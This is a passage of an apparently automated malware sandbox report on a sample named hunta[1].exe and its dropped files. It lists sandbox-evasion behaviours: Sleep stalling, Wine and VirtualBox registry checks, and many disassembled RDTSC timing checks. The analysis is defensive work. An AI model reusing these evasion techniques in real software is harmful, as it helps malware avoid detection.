Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Stalling execution: Execution stalls by calling Sleep			graph_21-23073
Source: C:\Users\user\Desktop\hunta[1].exe	Stalling execution: Execution stalls by calling Sleep			graph_2-23668

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\hunta[1].exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 113B018 second address: 113B024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11444A7 second address: 11444AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1144604 second address: 114460E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1144796 second address: 114479C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 114479C second address: 11447A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11447A0 second address: 11447B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FF2E5514DE6h 0x0000000d jnl 00007FF2E5514DE6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 114860C second address: 114862F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FF2E55A2C26h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF2E55A2C34h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 114862F second address: 1148647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1148647 second address: 114864B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 114864B second address: 114866F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jbe 00007FF2E5514DECh 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007FF2E5514DE6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 114866F second address: 1148675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1148675 second address: 114869D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E5514DF2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11486F9 second address: 1148703 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF2E55A2C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1148703 second address: 114871F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jmp 00007FF2E5514DEEh 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 114871F second address: 1148723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1148723 second address: 1148740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 and dl, 0000001Bh 0x0000000b push 00000000h 0x0000000d xor dword ptr [ebp+122D1A23h], esi 0x00000013 push 4EE73472h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1148740 second address: 1148744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1148744 second address: 11487AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 4EE734F2h 0x0000000e mov ecx, dword ptr [ebp+122D2ADDh] 0x00000014 push 00000003h 0x00000016 jne 00007FF2E5514DECh 0x0000001c mov esi, dword ptr [ebp+122D2815h] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007FF2E5514DE8h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D23CFh], ebx 0x00000044 push 00000003h 0x00000046 and ecx, 7F146AAAh 0x0000004c push 44534459h 0x00000051 push eax 0x00000052 push edx 0x00000053 push ebx 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 pop ebx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 114886B second address: 1148870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1148870 second address: 1148876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1148876 second address: 11488F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c and ebx, dword ptr [ebp+122D28A1h] 0x00000012 call 00007FF2E55A2C2Fh 0x00000017 sub dword ptr [ebp+122D1888h], ebx 0x0000001d pop esi 0x0000001e popad 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FF2E55A2C28h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b jmp 00007FF2E55A2C31h 0x00000040 push C06D0BD7h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FF2E55A2C39h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1148A9F second address: 1148AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF0h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1148AB9 second address: 1148B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 00E98075h 0x0000000d jmp 00007FF2E55A2C34h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF2E55A2C28h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 sub esi, dword ptr [ebp+122D18BAh] 0x00000036 push 00000003h 0x00000038 mov dword ptr [ebp+122D1A42h], ecx 0x0000003e push 92C0012Ch 0x00000043 pushad 0x00000044 ja 00007FF2E55A2C2Ch 0x0000004a je 00007FF2E55A2C26h 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1132A23 second address: 1132A6C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E5514E12h 0x00000008 jmp 00007FF2E5514DF7h 0x0000000d jmp 00007FF2E5514DF5h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FF2E5514DEEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11670EB second address: 116710C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E55A2C30h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116710C second address: 1167112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1167112 second address: 116711F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FF2E55A2C26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116711F second address: 1167123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1167398 second address: 116739C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116739C second address: 11673B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF2E5514DEEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1167501 second address: 1167507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1167655 second address: 116767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FF2E5514DECh 0x0000000b jmp 00007FF2E5514DEEh 0x00000010 pop esi 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1167ABD second address: 1167AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1167EC1 second address: 1167EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1167EDB second address: 1167EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1134565 second address: 1134571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FF2E5514DE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116832D second address: 116834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF2E55A2C26h 0x0000000a jp 00007FF2E55A2C26h 0x00000010 popad 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FF2E55A2C2Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116834B second address: 1168352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1168352 second address: 1168357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1168357 second address: 1168370 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007FF2E5514DE6h 0x00000009 js 00007FF2E5514DE6h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jnc 00007FF2E5514DE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11688EF second address: 11688F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1168B7E second address: 1168B84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1168CF7 second address: 1168CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1168CFD second address: 1168D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E5514DF2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1168D18 second address: 1168D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116B422 second address: 116B42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116E9C6 second address: 116E9D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116EB09 second address: 116EB0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116EB0E second address: 116EB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E55A2C26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116EB24 second address: 116EB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DEDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116EB36 second address: 116EB3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 116EC38 second address: 116EC51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF2E5514DF1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1170CD1 second address: 1170CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1170CDE second address: 1170CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1170CE2 second address: 1170CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1170CE6 second address: 1170CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 113E585 second address: 113E58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1139529 second address: 113952D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1174B74 second address: 1174B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1174B8D second address: 1174B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1174B9D second address: 1174BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C2Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1174BB1 second address: 1174BB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1174BB7 second address: 1174BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1174D1A second address: 1174D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FF2E5514DE6h 0x0000000c rdtsc
